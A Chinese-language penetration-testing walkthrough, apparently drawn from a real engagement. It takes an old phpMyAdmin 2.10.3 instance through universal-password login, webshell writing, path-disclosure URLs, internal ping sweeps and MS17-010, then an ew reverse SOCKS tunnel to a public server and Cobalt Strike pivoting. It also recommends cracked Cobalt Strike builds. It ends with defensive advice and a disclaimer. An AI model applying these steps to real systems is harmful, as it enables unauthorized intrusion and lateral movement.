我遇到的实战渗透
字数 1333 2025-08-25 22:58:34
PHPMyAdmin渗透测试实战教学文档
信息收集阶段
1. 基础信息收集
- 网站扫描工具:使用https://scan.top15.cn/web/等在线扫描工具获取网站基本信息
- 操作系统识别:
- Windows对URL大小写不敏感,Linux敏感
- 使用火狐插件辅助判断
- 端口探测:重点关注443端口(HTTPS服务)
2. PHPMyAdmin发现与利用
- 发现版本:2.10.3
- 漏洞利用步骤:
- 尝试万能密码:
'localhost'@'@' - 成功登录后尝试两种getshell方法:
into outfile直接写文件(可能因权限问题失败)- 利用MySQL日志文件重命名写入shell(低版本可能不支持)
- 尝试万能密码:
3. 绝对路径获取方法
- 尝试访问以下路径:
phpMyAdmin/libraries/select_lang.lib.php phpMyAdmin/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang[]=1 phpmyadmin/themes/darkblue_orange/layout.inc.php - 其他方法:
- 查看phpinfo信息
- 使用Google语法搜索
- 通过Google镜像站搜索
外网渗透阶段
1. Webshell上传与管理
- 使用蚁剑、菜刀等工具连接webshell
- 注意disable_functions限制
- 回显问题处理:
- 初始有回显,后续可能消失但命令仍可执行
- 尝试重新上传webshell
2. 服务器安全措施
- 修改默认SSH端口防止爆破
- 使用screen保持会话
- 服务器环境:阿里云学生机
内网渗透阶段
1. 横向移动准备
-
环境判断:
- 检查是否为域环境(systeminfo查看)
- 注意假域环境(工作组修改名称可能混淆)
-
权限检查:
- 提权至最高权限(已获取system权限)
- 检查是否为域用户会话
2. 内网信息收集
-
存活主机探测:
for /l %i in (1,1,255) do @ ping 192.168.124.%i -w 1 -n 1|find /i "ttl="- 使用nbtscan扫描内网存活IP及目标所属
-
端口扫描与服务识别:
- 浏览器代理访问内网服务
- 检查是否有端口转发/NAT
3. 横向渗透技术
-
凭证利用:
- 使用已获取的管理密码尝试登录其他系统
- 尝试make_token仿冒域用户
-
漏洞利用:
- MS17-010(永恒之蓝)漏洞尝试
- 其他已知漏洞利用
-
代理设置:
- 使用CS建立sock4代理
- ew工具设置:
# 目标机 ew_win32.exe -s rssocks -d x.x.x.x -e 1024 # 公网服务器 ./ew_linux_x64 -s rcsocks -l 1024 -e 1080 & - 配合proxifier使用
-
CS插件推荐:
- 使用https://www.codercto.com/a/57741.html提供的插件脚本
常见问题与解决方案
1. CS会话不稳定
- 可能原因:破解版不完全
- 解决方案:使用完全破解版本
2. 命令执行无回显
- 可能原因:disable_functions限制
- 解决方案:
- 尝试不同webshell
- 使用其他执行方式(如日志写入)
3. 域环境判断错误
- 注意区分真实域环境与工作组环境
- 验证方法:
- 尝试执行域命令
- 检查域控IP是否存在
防御措施
-
PHPMyAdmin防护:
- 及时更新版本
- 限制访问IP
- 使用强密码
-
内网防护:
- 定期更改管理密码
- 监控异常登录
- 限制横向移动路径
-
日志监控:
- 关注异常文件创建
- 监控可疑进程
总结
本案例展示了从外网PHPMyAdmin漏洞利用到内网横向移动的完整渗透流程,重点包括:
- 信息收集的全面性与准确性
- PHPMyAdmin低版本漏洞利用技巧
- 内网环境判断与横向移动方法
- 代理工具的使用与CS框架应用
注意:本文仅用于教学研究,严禁用于非法用途。实际操作中请遵守法律法规,获得授权后进行测试。